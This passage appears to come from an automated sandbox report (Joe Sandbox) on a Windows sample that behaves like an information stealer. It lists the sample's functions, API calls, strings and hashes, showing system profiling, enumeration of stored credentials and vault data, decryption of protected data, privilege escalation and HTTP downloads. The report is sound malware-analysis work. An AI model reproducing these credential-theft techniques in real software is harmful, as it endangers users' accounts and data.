API ID: Object$DeleteMetricsSystem$CreateSelectStream_$CapsCompatibleCriticalDeviceReleaseSection$BitmapEnterLeaveReadResetSizeStream
String ID:
API String ID: 3214587331-3916222277
Opcode ID: e8e9b911cd9b9f557c011d0a693391b94df579aa06795856880fde4b09ecdcd5
Instruction ID: b636ad906776eb9627b9d9cd8b810946d3616b61857f0cb9459ff65bdffa2c87
Opcode Fuzzy Hash: e8e9b911cd9b9f557c011d0a693391b94df579aa06795856880fde4b09ecdcd5
Instruction Fuzzy Hash: B5B13372658BC486E760DB21E89839AB3A5F7C9B80F408555EA8F43B5BDF3CC485CB50

Function 00000209335998C0 Relevance: 27.2, APIs: 18, Instructions: 229
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesExW.KERNEL32 ref: 000002093359996D
GetLastError.KERNEL32 ref: 0000020933599977
FindFirstFileW.KERNEL32 ref: 000002093359998E
GetLastError.KERNEL32 ref: 000002093359999A
FindClose.KERNEL32 ref: 00000209335999A8
__std_fs_open_handle.LIBCPMT ref: 0000020933599A3B
CloseHandle.KERNEL32 ref: 0000020933599A51
CloseHandle.KERNEL32 ref: 0000020933599BC4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Close$ErrorFileFindHandleLast$AttributesFirst__std_fs_open_handle
String ID:
API String ID: 2398595512-0
Opcode ID: 9b9cafa6476ba7d57e6375b49b2d31870033937920a690a77e8b0d8031f3f21f
Instruction ID: 5532d44b2be94ae9e119d4bc1270c72dd2adb84ea47f85df71150db4e6758de6
Opcode Fuzzy Hash: 9b9cafa6476ba7d57e6375b49b2d31870033937920a690a77e8b0d8031f3f21f
Instruction Fuzzy Hash: 68918131384B4146E6748B25A88C76A63A7E7C57B4F18C794BABF476D7DB38C8818F40

Function 0000020933561660 Relevance: 26.6, APIs: 4, Strings: 10, Instructions: 2133timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32 ref: 0000020933561990

Strings

ram, xrefs: 000002093356285B
computer_name, xrefs: 0000020933562954
user_name, xrefs: 000002093356242F
cpu, xrefs: 0000020933562618
time, xrefs: 0000020933563041
[UTC, xrefs: 0000020933561963
timezone, xrefs: 0000020933563414
gpu, xrefs: 0000020933562522
system, xrefs: 00000209335623E4, 00000209335624D3, 00000209335625C9, 00000209335626C3, 000002093356280B, 0000020933562905, 00000209335629F8, 0000020933562B7F, 0000020933562D70, 0000020933562FF1, 00000209335631B4, 00000209335633CE, 000002093356356D, 0000020933563717, 00000209335637DD
%d-%m-%Y, %H:%M:%S, xrefs: 0000020933562F5F

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: InformationTimeZone
String ID: %d-%m-%Y, %H:%M:%S$[UTC$computer_name$cpu$gpu$ram$system$time$timezone$user_name
API String ID: 565725191-1610854563
Opcode ID: 123d487661a5f22c29636f7a6c51f9c18f28e0d22ac937c5e5986b5e2cb5974a
Instruction ID: 846a2a9331364124b2c73be9f3721297b0c0322786b11de62749906eabe1bbec
Opcode Fuzzy Hash: 123d487661a5f22c29636f7a6c51f9c18f28e0d22ac937c5e5986b5e2cb5974a
Instruction Fuzzy Hash: 1E236D72654BC485EB20CF25E8843DD67A1F7D9798F409255FA9E47BABDB78C280CB00

Function 0000020933561FF0 Relevance: 22.5, APIs: 3, Strings: 9, Instructions: 1516COMMON

Download Yara Rule

APIs

Part of subcall function 0000020933560C30: GetCurrentHwProfileW.ADVAPI32 ref: 0000020933560C6C

Part of subcall function 0000020933560500: EnumDisplayDevicesW.USER32 ref: 0000020933560617
Part of subcall function 0000020933560500: EnumDisplayDevicesW.USER32 ref: 00000209335606BB

Part of subcall function 0000020933560420: RegGetValueA.ADVAPI32 ref: 0000020933560489

Part of subcall function 0000020933560110: GetUserNameW.ADVAPI32 ref: 0000020933560155

Part of subcall function 00000209335601B0: GetComputerNameW.KERNEL32 ref: 00000209335601F5

GlobalMemoryStatusEx.KERNEL32 ref: 000002093356277C
wcsftime.LIBCMT ref: 0000020933562F72
GetModuleFileNameA.KERNEL32 ref: 0000020933563106

Strings

ram, xrefs: 000002093356285B
computer_name, xrefs: 0000020933562954
user_name, xrefs: 000002093356242F
cpu, xrefs: 0000020933562618
time, xrefs: 0000020933563041
timezone, xrefs: 0000020933563414
gpu, xrefs: 0000020933562522
system, xrefs: 00000209335623E4, 00000209335624D3, 00000209335625C9, 00000209335626C3, 000002093356280B, 0000020933562905, 00000209335629F8, 0000020933562B7F, 0000020933562D70, 0000020933562FF1, 00000209335631B4, 00000209335633CE, 000002093356356D, 0000020933563717, 00000209335637DD
%d-%m-%Y, %H:%M:%S, xrefs: 0000020933562F5F

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Name$DevicesDisplayEnum$ComputerCurrentFileGlobalMemoryModuleProfileStatusUserValuewcsftime
String ID: %d-%m-%Y, %H:%M:%S$computer_name$cpu$gpu$ram$system$time$timezone$user_name
API String ID: 2509368203-1182675529
Opcode ID: aba6a5d48ff3678e148a89ffaa5d76140a35831bcd4146eac03ba2855a0c4e40
Instruction ID: 415ebb3c28e3c5071b06cf0d25e981844fef09e6dbdb2bb79e1dfff2a985785e
Opcode Fuzzy Hash: aba6a5d48ff3678e148a89ffaa5d76140a35831bcd4146eac03ba2855a0c4e40
Instruction Fuzzy Hash: 4EF26D32654BC099DB21CF25E8943DD77A1F7D9798F409255EA8E47BABDB78C280CB00

Function 000002093351B820 Relevance: 20.1, APIs: 8, Strings: 3, Instructions: 862
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 000002093351B90C
GetProcAddress.KERNEL32 ref: 000002093351BA17
GetProcAddress.KERNEL32 ref: 000002093351BAD9
GetProcAddress.KERNEL32 ref: 000002093351BB53
GetProcAddress.KERNEL32 ref: 000002093351BBD5
GetProcAddress.KERNEL32 ref: 000002093351BC4F
GetProcAddress.KERNEL32 ref: 000002093351BCD3
FreeLibrary.KERNEL32 ref: 000002093351C801

Strings

cannot use push_back() with , xrefs: 000002093351C84F
system, xrefs: 000002093351C60D
vault, xrefs: 000002093351C663

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: cannot use push_back() with $system$vault
API String ID: 2449869053-1741236777
Opcode ID: 76f16fbbada73c4449948150c6da25d75cc43713174396573733503e1e18b46d
Instruction ID: 3d23bc200b93b056b4b85caf32a31116768d9bee4a2f305c8dd0e2b7703f9747
Opcode Fuzzy Hash: 76f16fbbada73c4449948150c6da25d75cc43713174396573733503e1e18b46d
Instruction Fuzzy Hash: 3B927D32645BC489DB60CF29E8853DD73A4F789798F108216EB9D4BB9AEF75C684C700

Function 0000020933556480 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 173
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000020933559760: GetCurrentProcess.KERNEL32 ref: 000002093355979B
Part of subcall function 0000020933559760: OpenProcessToken.ADVAPI32 ref: 00000209335597AE
Part of subcall function 0000020933559760: GetTokenInformation.ADVAPI32 ref: 00000209335597EA

ExitProcess.KERNEL32 ref: 00000209335564C7
OpenMutexA.KERNEL32 ref: 00000209335565E2
ExitProcess.KERNEL32 ref: 00000209335565F2
CreateMutexA.KERNEL32 ref: 0000020933556611
ExitProcess.KERNEL32 ref: 0000020933556637

Part of subcall function 0000020933559AA0: GetModuleFileNameW.KERNEL32 ref: 0000020933559AEA

Part of subcall function 0000020933564740: CoInitializeEx.OLE32 ref: 00000209335647AA

Strings

SeDebugPrivilege, xrefs: 00000209335564CE
SeImpersonatePrivilege, xrefs: 00000209335564DA

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Process$Exit$MutexOpenToken$CreateCurrentFileInformationInitializeModuleName
String ID: SeDebugPrivilege$SeImpersonatePrivilege
API String ID: 470559343-3768118664
Opcode ID: d8465b7527b93e41d2229d95f250516f8e06de47bc93678417f62be9cd1307c6
Instruction ID: d921671d6182d88e1e9e11593a5b4bfc318b911016a7d752341ee9a41c3ead08
Opcode Fuzzy Hash: d8465b7527b93e41d2229d95f250516f8e06de47bc93678417f62be9cd1307c6
Instruction Fuzzy Hash: FD617261599BC081FA10AB64E4DD3AE73A0EBC5790F50D695F68F46ADBDF28C0C4CE50

Function 000002093358114C Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 335
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0000020933581191

Part of subcall function 00000209335807F8: _invalid_parameter_noinfo.LIBCMT ref: 000002093358080C

Part of subcall function 000002093357B550: HeapFree.KERNEL32 ref: 000002093357B566
Part of subcall function 000002093357B550: GetLastError.KERNEL32 ref: 000002093357B570

Part of subcall function 0000020933589D94: _invalid_parameter_noinfo.LIBCMT ref: 0000020933589CDF

_get_daylight.LIBCMT ref: 0000020933581180

Part of subcall function 0000020933580858: _invalid_parameter_noinfo.LIBCMT ref: 000002093358086C

_get_daylight.LIBCMT ref: 00000209335813F6
_get_daylight.LIBCMT ref: 0000020933581407
_get_daylight.LIBCMT ref: 0000020933581418
GetTimeZoneInformation.KERNEL32 ref: 000002093358143F

Strings

Eastern Summer Time, xrefs: 00000209335814FD
Eastern Standard Time, xrefs: 00000209335814E5

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 355007559-239921721
Opcode ID: 81739166be4aa7f83f73f8b5c4c772bb7cbf832f5b2b22088efdd0610fe74ccd
Instruction ID: 68b3b6125fa739d350dbbeba35a774535b6fe285acc3cbda2210f175d309f628
Opcode Fuzzy Hash: 81739166be4aa7f83f73f8b5c4c772bb7cbf832f5b2b22088efdd0610fe74ccd
Instruction Fuzzy Hash: 42D1A32674034095E760EF26D4DA7A967A1F7C4B84F44C265FA4F8BA97DB38C9C18F40

Function 000002093355F200 Relevance: 13.9, APIs: 9, Instructions: 408
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET ref: 000002093355F3CB
InternetOpenUrlA.WININET ref: 000002093355F4A8
HttpQueryInfoW.WININET ref: 000002093355F509
HttpQueryInfoW.WININET ref: 000002093355F5A2
InternetQueryDataAvailable.WININET ref: 000002093355F5E6
InternetReadFile.WININET ref: 000002093355F6A9
InternetQueryDataAvailable.WININET ref: 000002093355F774
InternetCloseHandle.WININET ref: 000002093355F81E
Concurrency::cancel_current_task.LIBCPMT ref: 000002093355F87B

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Internet$Query$AvailableDataHttpInfoOpen$CloseConcurrency::cancel_current_taskFileHandleRead
String ID:
API String ID: 1475545111-0
Opcode ID: 3e87eb1c93d761989d0f06b6f136285c2cc6f0a5e9d74a292ec3fbfe60c832c5
Instruction ID: fadb382758e60a757ddee27b50a249951cf9b06d0863eb99953fb97346e74e44
Opcode Fuzzy Hash: 3e87eb1c93d761989d0f06b6f136285c2cc6f0a5e9d74a292ec3fbfe60c832c5
Instruction Fuzzy Hash: CA026D32A54B9486FB10CB69E88439E77A5F795798F108315EE9E57F9ADF38D080CB00

Function 000002093359E968 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002093359E54C: _invalid_parameter_noinfo.LIBCMT ref: 000002093359E58D
Part of subcall function 000002093359E54C: _invalid_parameter_noinfo.LIBCMT ref: 000002093359E60B
Part of subcall function 000002093359E54C: _invalid_parameter_noinfo.LIBCMT ref: 000002093359E65C

CreateFileW.KERNEL32 ref: 000002093359EA6E
CreateFileW.KERNEL32 ref: 000002093359EABE
GetLastError.KERNEL32 ref: 000002093359EAEE
GetFileType.KERNEL32 ref: 000002093359EB03
GetLastError.KERNEL32 ref: 000002093359EB0D
CloseHandle.KERNEL32 ref: 000002093359EB40
CloseHandle.KERNEL32 ref: 000002093359ECA3
CreateFileW.KERNEL32 ref: 000002093359ECD8
GetLastError.KERNEL32 ref: 000002093359ECE7

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 484b9744f6cc28d441a3ba22cd2a9bb849a09fc1e06d845b9773f87c4c6ec638
Instruction ID: 3f3a1f1b0f534c729f043a0339e9a0d52d1592337356987ea04dd4b8908639e9
Opcode Fuzzy Hash: 484b9744f6cc28d441a3ba22cd2a9bb849a09fc1e06d845b9773f87c4c6ec638
Instruction Fuzzy Hash: 06C1AF36760B4085EB10CFA9C4957AC3762F389B98F019659EF5F5B7A6CB38C491CB40

Function 0000020933558F60 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 451
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileSize.KERNEL32 ref: 00000209335591A1
SetFilePointer.KERNEL32 ref: 0000020933559254
ReadFile.KERNEL32 ref: 0000020933559283

Strings

ios_base::eofbit set, xrefs: 00000209335596C4
ios_base::badbit set, xrefs: 00000209335596B1, 000002093355972F
ios_base::failbit set, xrefs: 00000209335596BD
exists, xrefs: 000002093355970A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: File$PointerReadSize
String ID: exists$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 404940565-15404121
Opcode ID: 7b83970aff35c52e2cb1845d3651176359b1979141300e62312bc6a1e55c53c0
Instruction ID: acd1f3ab3ce8f8036a78fa48d5c1fba4c964b2d3504cf6f1ad3e5f74ad16ee77
Opcode Fuzzy Hash: 7b83970aff35c52e2cb1845d3651176359b1979141300e62312bc6a1e55c53c0
Instruction Fuzzy Hash: 05322632655BC4C9EB20CF34D8843DD37A1F785748F548256EA8E5BB9AEB74C685CB00

Function 00000209335813C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00000209335813F6

Part of subcall function 0000020933580858: _invalid_parameter_noinfo.LIBCMT ref: 000002093358086C

_get_daylight.LIBCMT ref: 0000020933581407

Part of subcall function 00000209335807F8: _invalid_parameter_noinfo.LIBCMT ref: 000002093358080C

_get_daylight.LIBCMT ref: 0000020933581418

Part of subcall function 0000020933580828: _invalid_parameter_noinfo.LIBCMT ref: 000002093358083C

Part of subcall function 000002093357B550: HeapFree.KERNEL32 ref: 000002093357B566
Part of subcall function 000002093357B550: GetLastError.KERNEL32 ref: 000002093357B570

GetTimeZoneInformation.KERNEL32 ref: 000002093358143F

Strings

Eastern Summer Time, xrefs: 00000209335814FD
Eastern Standard Time, xrefs: 00000209335814E5

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 8c7917a29c397fa3200ed5a7405142a85cef7c6524de68c4b18d81a385570565
Instruction ID: e6f3ba27fdcc6e61128cd45d32472cd27393bc75c6b434d3cc6637a40fb67896
Opcode Fuzzy Hash: 8c7917a29c397fa3200ed5a7405142a85cef7c6524de68c4b18d81a385570565
Instruction Fuzzy Hash: 6D51403275074096E750DF25E8CA6997761F7C8788F44C266FA4F8BA97DB38C9818F40

Function 000002093357749C Relevance: 9.2, APIs: 6, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000209335774BE
_get_daylight.LIBCMT ref: 000002093357751E
_get_daylight.LIBCMT ref: 000002093357752F
_get_daylight.LIBCMT ref: 0000020933577540
_isindst.LIBCMT ref: 0000020933577591
_isindst.LIBCMT ref: 00000209335775E4

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
String ID:
API String ID: 1405656091-0
Opcode ID: 842d06e59cb7d0c874962108e89d6781c57040cb1ba9c53ec58eb2fa30030a5a
Instruction ID: 79d2661c6eafc76d063c82db1ecb56c9ab9f6db7ec3d5f9ba573bf26beaa6185
Opcode Fuzzy Hash: 842d06e59cb7d0c874962108e89d6781c57040cb1ba9c53ec58eb2fa30030a5a
Instruction Fuzzy Hash: 1A81B8B27403458BEB588F29D9857B877A5E794788F04D125FA0E8F78BEB38D5818F40

Function 0000020933568B70 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 0000020933568D24
__std_exception_destroy.LIBVCRUNTIME ref: 0000020933568D32
__std_exception_destroy.LIBVCRUNTIME ref: 0000020933568FB5
__std_exception_destroy.LIBVCRUNTIME ref: 0000020933568FC3

Strings

value, xrefs: 0000020933568C4A, 0000020933568EE3

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: __std_exception_destroy
String ID: value
API String ID: 2453523683-494360628
Opcode ID: ecdf69cd69b4c6d6f175d64c67e32b2bac2491c85671dd8582bc309280b551c7
Instruction ID: 0ee6690eb987950652e5e15aa2f804dd96085f30699880bab81b1160e92beddf
Opcode Fuzzy Hash: ecdf69cd69b4c6d6f175d64c67e32b2bac2491c85671dd8582bc309280b551c7
Instruction Fuzzy Hash: 47027E62A54BC085EB00CB75D4883AE6761E7C57A4F50E341FA9E47ADBDB78C5C5CB00

Function 000002093351C8C0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 328processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 000002093351C90A
Process32FirstW.KERNEL32 ref: 000002093351C94C
Process32NextW.KERNEL32 ref: 000002093351CB43
CloseHandle.KERNEL32 ref: 000002093351CDBA

Strings

[PID: , xrefs: 000002093351C98E

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: [PID:
API String ID: 420147892-2210602247
Opcode ID: ae6bdd9e6bd57c75c51ff679de61fb46218221ed653ac09c1c58d8a7a3092779
Instruction ID: fedf25d121f5665762839384965b7c27c84ea337b72250eba869c48dc1cfdcbd
Opcode Fuzzy Hash: ae6bdd9e6bd57c75c51ff679de61fb46218221ed653ac09c1c58d8a7a3092779
Instruction Fuzzy Hash: 73E18072654BC085EB20DB25E88539D77A5F3C97A8F508255FA9E47B9BDF38C284CB00

Function 0000020933565970 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00000209335659BE
OpenProcessToken.ADVAPI32 ref: 00000209335659D1
LookupPrivilegeValueW.ADVAPI32 ref: 00000209335659F2
AdjustTokenPrivileges.ADVAPI32 ref: 0000020933565A38
CloseHandle.KERNEL32 ref: 0000020933565A58

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 29a02e95aae9899e0029659e102052f54fff5397b51cb33b914b83ea41570e5f
Instruction ID: 7c739d264e4e62a6e6b2f41b794e657ac05becdb6a1694d03a0422a10e3c9aea
Opcode Fuzzy Hash: 29a02e95aae9899e0029659e102052f54fff5397b51cb33b914b83ea41570e5f
Instruction Fuzzy Hash: E0216F32258B8086E7508F52F88834AB3A0F7C8B90F559125FA8E47B5ADF7CC584CB40

Function 000002093351ACC0 Relevance: 5.9, APIs: 2, Strings: 1, Instructions: 671COMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32 ref: 000002093351AD22
CredFree.ADVAPI32 ref: 000002093351B746

Strings

cannot use push_back() with , xrefs: 000002093351B794

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: Cred$EnumerateFree
String ID: cannot use push_back() with
API String ID: 3403564193-4122110429
Opcode ID: d5f9253623e8f1766244f15378d1c3bdda08fbf2dfeef4e6f1547bc32b20e121
Instruction ID: 6f2e4ba095ed8a1d9aa5a5bb67f1578d02082e5e15e0d88f1d3bdca63092defa
Opcode Fuzzy Hash: d5f9253623e8f1766244f15378d1c3bdda08fbf2dfeef4e6f1547bc32b20e121
Instruction Fuzzy Hash: 07628072644BC489EB20CF25E8843DD77A1F789798F509355EAAD57B9ADF38C284CB00

Function 00007FF6CFA37FD0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CFA3822F
__std_exception_copy.LIBVCRUNTIME ref: 00007FF6CFA38298

Strings

1.3.1.zlib-ng, xrefs: 00007FF6CFA38038

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
String ID: 1.3.1.zlib-ng
API String ID: 1109970293-992988628
Opcode ID: a76c52ca1100295dce4388bd63296ac4753b9ff7154bfa9c896794fd626aff6e
Instruction ID: c06d63f41880f6c1f19d4f8fa108609d1eec879e7cc08d98f88e2412db2373c2
Opcode Fuzzy Hash: a76c52ca1100295dce4388bd63296ac4753b9ff7154bfa9c896794fd626aff6e
Instruction Fuzzy Hash: D281C463F14B8185EB10CFB1E4402ED73A1EB94799F108232EE9D97B99EE38E595C350

Function 00007FF6CFA315F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL ref: 00007FF6CFA31645
NtProtectVirtualMemory.NTDLL ref: 00007FF6CFA31698

Strings

0, xrefs: 00007FF6CFA31623

Memory Dump Source

Source File: 00000009.00000002.1754955296.00007FF6CFA31000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF6CFA30000, based on PE: true

Associated: 00000009.00000002.1754933672.00007FF6CFA30000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFA68000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755056820.00007FF6CFCA6000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755229476.00007FF6CFCB0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000009.00000002.1755293595.00007FF6CFCB3000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff6cfa30000_sUKFphHSzX.jbxd

Similarity

API ID: MemoryVirtual$ProtectQuery
String ID: 0
API String ID: 1355999870-4108050209
Opcode ID: 1e8753ed2aab2ba12e738e60e9ac9591d6e3866d73b3672bb0ead951c35cddb0
Instruction ID: 9cb81079b346cc424e84cf46ff0ae7447a4a56a19c892dc188e8aaf845bca3f2
Opcode Fuzzy Hash: 1e8753ed2aab2ba12e738e60e9ac9591d6e3866d73b3672bb0ead951c35cddb0
Instruction Fuzzy Hash: EA113326A19F8182E6508F64F850366B3A4FB887B5F101735FAED437A4DF3CD0948B10

Function 0000020933551EA0 Relevance: 3.1, APIs: 2, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32 ref: 0000020933551EF8
LocalFree.KERNEL32 ref: 0000020933551F8A

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 534917215b691bdf8008ca3940d01222a19eb5e5d5bf9c8332b99172fc4e0cb2
Instruction ID: a71efa36d013eac02e9883498e95f71ae61bb865be8ed5ef67dbf73e26ea56f4
Opcode Fuzzy Hash: 534917215b691bdf8008ca3940d01222a19eb5e5d5bf9c8332b99172fc4e0cb2
Instruction Fuzzy Hash: 68416932614B80CAF7208F34D48439D37A4F79878CF044269BA8E46E4BDB74D6A4C754

Function 00000209335613B0 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetLogicalDriveStringsW.KERNEL32 ref: 0000020933561421

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

API ID: DriveLogicalStrings
String ID:
API String ID: 2022863570-0
Opcode ID: 05563d9c9f8d9765ab942f76f343afa8ceddb3167ad04ffcdfa04968ca2d4d44
Instruction ID: 09ff09b08a6868d790a316eb949e433d73b2f9ebf277d7029846bf8160c29f2b
Opcode Fuzzy Hash: 05563d9c9f8d9765ab942f76f343afa8ceddb3167ad04ffcdfa04968ca2d4d44
Instruction Fuzzy Hash: AF419D33A58B8082E710CF25E88439EB774F7D4788F109255EE8D23A6ADB78D5D1DB40

Function 0000020933560110 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0000020933560155

Memory Dump Source

Source File: 00000009.00000002.1754255059.00000209334E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000209334E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_209334e0000_sUKFphHSzX.jbxd

Yara matches

Similarity

